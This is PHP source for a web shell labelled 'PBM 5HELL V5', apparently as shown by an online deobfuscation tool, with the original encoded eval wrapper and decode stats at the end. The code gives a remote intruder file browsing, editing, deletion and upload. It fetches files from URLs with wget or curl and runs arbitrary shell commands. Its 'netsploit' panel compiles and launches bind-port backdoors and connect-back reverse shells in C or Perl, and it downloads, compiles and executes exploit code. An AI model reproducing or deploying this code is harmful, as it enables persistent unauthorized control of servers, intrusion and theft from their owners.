   elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ eval(gzinflate(base64_decode($jumper))); "</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> "; 
   if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","
"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); 
   if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?> 
   <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post"> 
   <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> 
   <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
   <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); 
   $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> 
   <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post"> 
   <table class="tabnet" style="width:320px;padding:0 1px;"> 
   <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> 
   <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload"> 
   <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> 
   <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
   <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> 
   <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> 
   <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> 
   <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> 
   <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> 
   <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td>
   <td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> 
   <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use">
   <option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> 
   <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td>
   <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> 
   <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> 
   <tr><td><select size="1" class="inputz" name="pilihan"> 
   <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2">
   <input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> 
   <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output"> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> 
   <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> 
<?php
echo '<center><div class="tabnet"><b>-=[[ PBM 5HELL V5 ]]=-</b><br>Recoded By KEFIEX404<br><span class="olenk4">Remodif by OL3NK_T34</span></div>';

Did this file decode correctly?

Original Code

<?php
$sempax = '';
eval(gzuncompress(base64_decode($sempax)));
?>

Function Calls

gzuncompress 1
base64_decode 1

Variables

$sempax eJzsvel220iyLvq/1+p3QGv7tOxtS8JAymK55C4OAEiQAIWZQHVdXUwiQIwC..

Stats

MD5 dd71aaac5f90b047495fa843c7e11398
Eval Count 1
Decode Time 3195 ms